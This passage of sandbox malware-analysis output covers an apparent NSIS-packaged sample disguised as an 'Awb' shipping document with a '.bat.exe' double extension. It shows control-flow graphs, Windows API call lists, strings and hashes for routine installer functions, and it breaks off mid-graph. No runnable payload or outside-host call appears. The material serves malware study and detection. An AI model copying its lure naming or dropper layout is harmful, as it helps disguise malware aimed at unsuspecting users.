                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                    • String ID:
                                                                    • API String ID: 3282139019-0
                                                                    • Opcode ID: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                                                    • Instruction ID: e03fc219ec92158800d4d40d681534e4389e9639ccb8e5563fa4604b390d03ca
                                                                    • Opcode Fuzzy Hash: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                                                    • Instruction Fuzzy Hash: 29C1D171600300ABDB216F61ED89E2B3AB8FB95746F04053EF641B51F0CB799982DB6D

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 295 4039aa-4039c2 call 406694 298 4039c4-4039d4 call 406201 295->298 299 4039d6-403a0d call 406188 295->299 308 403a30-403a59 call 403c80 call 405c97 298->308 303 403a25-403a2b lstrcatW 299->303 304 403a0f-403a20 call 406188 299->304 303->308 304->303 313 403aeb-403af3 call 405c97 308->313 314 403a5f-403a64 308->314 319 403b01-403b26 LoadImageW 313->319 320 403af5-403afc call 4062dc 313->320 314->313 315 403a6a-403a84 call 406188 314->315 321 403a89-403a92 315->321 324 403ba7-403baf call 40140b 319->324 325 403b28-403b58 RegisterClassW 319->325 320->319 321->313 322 403a94-403a98 321->322 326 403aaa-403ab6 lstrlenW 322->326 327 403a9a-403aa7 call 405bbc 322->327 338 403bb1-403bb4 324->338 339 403bb9-403bc4 call 403c80 324->339 328 403c76 325->328 329 403b5e-403ba2 SystemParametersInfoW CreateWindowExW 325->329 333 403ab8-403ac6 lstrcmpiW 326->333 334 403ade-403ae6 call 405b8f call 4062ba 326->334 327->326 332 403c78-403c7f 328->332 329->324 333->334 337 403ac8-403ad2 GetFileAttributesW 333->337 334->313 341 403ad4-403ad6 337->341 342 403ad8-403ad9 call 405bdb 337->342 338->332 348 403bca-403be4 ShowWindow call 406624 339->348 349 403c4d-403c4e call 4053f5 339->349 341->334 341->342 342->334 354 403bf0-403c02 GetClassInfoW 348->354 355 403be6-403beb call 406624 348->355 352 403c53-403c55 349->352 356 403c57-403c5d 352->356 357 403c6f-403c71 call 40140b 352->357 360 403c04-403c14 GetClassInfoW RegisterClassW 354->360 361 403c1a-403c3d DialogBoxParamW call 40140b 354->361 355->354 356->338 362 403c63-403c6a call 40140b 356->362 357->328 360->361 365 403c42-403c4b call 4038fa 361->365 362->338 365->332
                                                                    APIs
                                                                      • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                      • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                    • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75573420,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",00000000), ref: 00403A2B
                                                                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\sillinesses,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403AAB
                                                                    • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\sillinesses,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403ABE
                                                                    • GetFileAttributesW.KERNEL32(Call), ref: 00403AC9
                                                                    • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\sillinesses), ref: 00403B12
                                                                      • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                    • RegisterClassW.USER32(00433E80), ref: 00403B4F
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B67
                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403BD2
                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BFE
                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403C0B
                                                                    • RegisterClassW.USER32(00433E80), ref: 00403C14
                                                                    • DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: "C:\Users\user\Desktop\Awb 4586109146.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\sillinesses$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                    • API String ID: 1975747703-3787320207
                                                                    • Opcode ID: 2904cd21c70d62866cc327d96625cdd9032e7e4c90c5b4ba07f750359117e74a
                                                                    • Instruction ID: 9f2b94ab3f1de80a41c8f53b965b22801f2352f665cd6d3f8e6571e1d6c0b700
                                                                    • Opcode Fuzzy Hash: 2904cd21c70d62866cc327d96625cdd9032e7e4c90c5b4ba07f750359117e74a
                                                                    • Instruction Fuzzy Hash: D861B9312407007ED720AF659D46E2B3A6CEB85B4AF40057FF945B51E2CBBD9941CB2D

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 369 402edd-402f2b GetTickCount GetModuleFileNameW call 405db0 372 402f37-402f65 call 4062ba call 405bdb call 4062ba GetFileSize 369->372 373 402f2d-402f32 369->373 381 403052-403060 call 402e79 372->381 382 402f6b 372->382 374 40310f-403113 373->374 388 403062-403065 381->388 389 4030b5-4030ba 381->389 384 402f70-402f87 382->384 386 402f89 384->386 387 402f8b-402f94 call 403331 384->387 386->387 394 402f9a-402fa1 387->394 395 4030bc-4030c4 call 402e79 387->395 392 403067-40307f call 403347 call 403331 388->392 393 403089-4030b3 GlobalAlloc call 403347 call 403116 388->393 389->374 392->389 416 403081-403087 392->416 393->389 420 4030c6-4030d7 393->420 398 402fa3-402fb7 call 405d6b 394->398 399 40301d-403021 394->399 395->389 407 40302b-403031 398->407 418 402fb9-402fc0 398->418 406 403023-40302a call 402e79 399->406 399->407 406->407 411 403040-40304a 407->411 412 403033-40303d call 406787 407->412 411->384 419 403050 411->419 412->411 416->389 416->393 418->407 422 402fc2-402fc9 418->422 419->381 423 4030d9 420->423 424 4030df-4030e4 420->424 422->407 425 402fcb-402fd2 422->425 423->424 426 4030e5-4030eb 424->426 425->407 427 402fd4-402fdb 425->427 426->426 428 4030ed-403108 SetFilePointer call 405d6b 426->428 427->407 430 402fdd-402ffd 427->430 431 40310d 428->431 430->389 432 403003-403007 430->432 431->374 433 403009-40300d 432->433 434 40300f-403017 432->434 433->419 433->434 434->407 435 403019-40301b 434->435 435->407
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00402EEE
                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Awb 4586109146.bat.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                      • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Awb 4586109146.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                      • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                    • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Awb 4586109146.bat.exe,C:\Users\user\Desktop\Awb 4586109146.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                    • String ID: "C:\Users\user\Desktop\Awb 4586109146.bat.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Awb 4586109146.bat.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                    • API String ID: 4283519449-3877308773
                                                                    • Opcode ID: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                                    • Instruction ID: dd9ea635540f9dffb1b2b479f8e1e5c18960c1b6140bd96a969558b27d112ec4
                                                                    • Opcode Fuzzy Hash: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                                    • Instruction Fuzzy Hash: C151F471901205ABDB20AF60DD85B9F7FA8FB0431AF15403BF910B62D5C7789E408BAD

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 649 4062dc-4062e7 650 4062e9-4062f8 649->650 651 4062fa-406310 649->651 650->651 652 406316-406323 651->652 653 406528-40652e 651->653 652->653 654 406329-406330 652->654 655 406534-40653f 653->655 656 406335-406342 653->656 654->653 658 406541-406545 call 4062ba 655->658 659 40654a-40654b 655->659 656->655 657 406348-406354 656->657 660 406515 657->660 661 40635a-406398 657->661 658->659 665 406523-406526 660->665 666 406517-406521 660->666 663 4064b8-4064bc 661->663 664 40639e-4063a9 661->664 669 4064be-4064c4 663->669 670 4064ef-4064f3 663->670 667 4063c2 664->667 668 4063ab-4063b0 664->668 665->653 666->653 676 4063c9-4063d0 667->676 668->667 673 4063b2-4063b5 668->673 674 4064d4-4064e0 call 4062ba 669->674 675 4064c6-4064d2 call 406201 669->675 671 406502-406513 lstrlenW 670->671 672 4064f5-4064fd call 4062dc 670->672 671->653 672->671 673->667 679 4063b7-4063ba 673->679 685 4064e5-4064eb 674->685 675->685 681 4063d2-4063d4 676->681 682 4063d5-4063d7 676->682 679->667 686 4063bc-4063c0 679->686 681->682 683 406412-406415 682->683 684 4063d9-4063f7 call 406188 682->684 690 406425-406428 683->690 691 406417-406423 GetSystemDirectoryW 683->691 692 4063fc-406400 684->692 685->671 689 4064ed 685->689 686->676 693 4064b0-4064b6 call 40654e 689->693 695 406493-406495 690->695 696 40642a-406438 GetWindowsDirectoryW 690->696 694 406497-40649b 691->694 697 4064a0-4064a3 692->697 698 406406-40640d call 4062dc 692->698 693->671 694->693 700 40649d 694->700 695->694 699 40643a-406444 695->699 696->695 697->693 703 4064a5-4064ab lstrcatW 697->703 698->694 705 406446-406449 699->705 706 40645e-406474 SHGetSpecialFolderLocation 699->706 700->697 703->693 705->706 710 40644b-406452 705->710 707 406476-40648d SHGetPathFromIDListW CoTaskMemFree 706->707 708 40648f 706->708 707->694 707->708 708->695 711 40645a-40645c 710->711 711->694 711->706
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040641D
                                                                    • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,?,00405359,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000), ref: 00406430
                                                                    • SHGetSpecialFolderLocation.SHELL32(00405359,0041C000,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,?,00405359,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000), ref: 0040646C
                                                                    • SHGetPathFromIDListW.SHELL32(0041C000,Call), ref: 0040647A
                                                                    • CoTaskMemFree.OLE32(0041C000), ref: 00406485
                                                                    • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
                                                                    • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,?,00405359,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000), ref: 00406503
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                    • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                    • API String ID: 717251189-3852979141
                                                                    • Opcode ID: be842abed2e65b63b3d72d51674aff3c14f059aabebd99e4c76d62d1777cce00
                                                                    • Instruction ID: 29f0adb049bea166a756856afc1b7ff582c4fdfd81cc2e884c30b49282791dbd
                                                                    • Opcode Fuzzy Hash: be842abed2e65b63b3d72d51674aff3c14f059aabebd99e4c76d62d1777cce00
                                                                    • Instruction Fuzzy Hash: E6611071A00111ABDF209F54DC41AAE37A9EF45318F26803FE943BA2D0D77D9AA1C79D

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 776 40176f-401794 call 402c41 call 405c06 781 401796-40179c call 4062ba 776->781 782 40179e-4017b0 call 4062ba call 405b8f lstrcatW 776->782 787 4017b5-4017b6 call 40654e 781->787 782->787 791 4017bb-4017bf 787->791 792 4017c1-4017cb call 4065fd 791->792 793 4017f2-4017f5 791->793 800 4017dd-4017ef 792->800 801 4017cd-4017db CompareFileTime 792->801 795 4017f7-4017f8 call 405d8b 793->795 796 4017fd-401819 call 405db0 793->796 795->796 803 40181b-40181e 796->803 804 40188d-4018b6 call 405322 call 403116 796->804 800->793 801->800 806 401820-40185e call 4062ba * 2 call 4062dc call 4062ba call 405920 803->806 807 40186f-401879 call 405322 803->807 817 4018b8-4018bc 804->817 818 4018be-4018ca SetFileTime 804->818 806->791 838 401864-401865 806->838 819 401882-401888 807->819 817->818 822 4018d0-4018db CloseHandle 817->822 818->822 820 402ace 819->820 826 402ad0-402ad4 820->826 824 4018e1-4018e4 822->824 825 402ac5-402ac8 822->825 828 4018e6-4018f7 call 4062dc lstrcatW 824->828 829 4018f9-4018fc call 4062dc 824->829 825->820 835 401901-4022fc call 405920 828->835 829->835 835->826 838->819 840 401867-401868 838->840 840->807
                                                                    APIs
                                                                    • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\sillinesses,?,?,00000031), ref: 004017B0
                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\sillinesses,?,?,00000031), ref: 004017D5
                                                                      • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Footballer Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                      • Part of subcall function 00405322: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                      • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                      • Part of subcall function 00405322: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,0040327A,0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0), ref: 0040537D
                                                                      • Part of subcall function 00405322: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll), ref: 0040538F
                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp$C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll$C:\Users\user\AppData\Local\sillinesses$Call
                                                                    • API String ID: 1941528284-577586341
                                                                    • Opcode ID: b6e6f7bddc079f3ddd16634b2c61c6438f2a5172cea4a8ba22e449da941a997b
                                                                    • Instruction ID: 24a82d921ca393d09b0f70664e9a68f54f64900ed4cc6ef124b6c19d11fe7a64
                                                                    • Opcode Fuzzy Hash: b6e6f7bddc079f3ddd16634b2c61c6438f2a5172cea4a8ba22e449da941a997b
                                                                    • Instruction Fuzzy Hash: 12419371900518BACF107BA5DD46DAF3A79EF45368F20423FF422B10E1DA3C8A519A6D

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 842 405322-405337 843 40533d-40534e 842->843 844 4053ee-4053f2 842->844 845 405350-405354 call 4062dc 843->845 846 405359-405365 lstrlenW 843->846 845->846 848 405382-405386 846->848 849 405367-405377 lstrlenW 846->849 851 405395-405399 848->851 852 405388-40538f SetWindowTextW 848->852 849->844 850 405379-40537d lstrcatW 849->850 850->848 853 40539b-4053dd SendMessageW * 3 851->853 854 4053df-4053e1 851->854 852->851 853->854 854->844 855 4053e3-4053e6 854->855 855->844
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                    • lstrlenW.KERNEL32(0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                    • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,0040327A,0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0), ref: 0040537D
                                                                    • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll), ref: 0040538F
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                    • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll
                                                                    • API String ID: 2531174081-1212379810
                                                                    • Opcode ID: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
                                                                    • Instruction ID: 851cb2e595d07e8670ef4c489cf40fd5108cb81fe88e509cf6dd9e4b353e565e
                                                                    • Opcode Fuzzy Hash: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
                                                                    • Instruction Fuzzy Hash: 20218371900518BACF11AFA5DD859CFBFB9EF45350F14807AF904B62A0C7B94A40DFA8

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 856 403116-40312d 857 403136-40313f 856->857 858 40312f 856->858 859 403141 857->859 860 403148-40314d 857->860 858->857 859->860 861 40315d-40316a call 403331 860->861 862 40314f-403158 call 403347 860->862 866 403170-403174 861->866 867 40331f 861->867 862->861 868 4032ca-4032cc 866->868 869 40317a-4031c3 GetTickCount 866->869 870 403321-403322 867->870 871 40330c-40330f 868->871 872 4032ce-4032d1 868->872 873 403327 869->873 874 4031c9-4031d1 869->874 875 40332a-40332e 870->875 876 403311 871->876 877 403314-40331d call 403331 871->877 872->873 878 4032d3 872->878 873->875 879 4031d3 874->879 880 4031d6-4031e4 call 403331 874->880 876->877 877->867 889 403324 877->889 882 4032d6-4032dc 878->882 879->880 880->867 888 4031ea-4031f3 880->888 886 4032e0-4032ee call 403331 882->886 887 4032de 882->887 886->867 893 4032f0-4032fc call 405e62 886->893 887->886 891 4031f9-403219 call 4067f5 888->891 889->873 898 4032c2-4032c4 891->898 899 40321f-403232 GetTickCount 891->899 900 4032c6-4032c8 893->900 901 4032fe-403308 893->901 898->870 902 403234-40323c 899->902 903 40327d-40327f 899->903 900->870 901->882 904 40330a 901->904 905 403244-403275 MulDiv wsprintfW call 405322 902->905 906 40323e-403242 902->906 907 403281-403285 903->907 908 4032b6-4032ba 903->908 904->873 914 40327a 905->914 906->903 906->905 911 403287-40328e call 405e62 907->911 912 40329c-4032a7 907->912 908->874 909 4032c0 908->909 909->873 917 403293-403295 911->917 913 4032aa-4032ae 912->913 913->891 916 4032b4 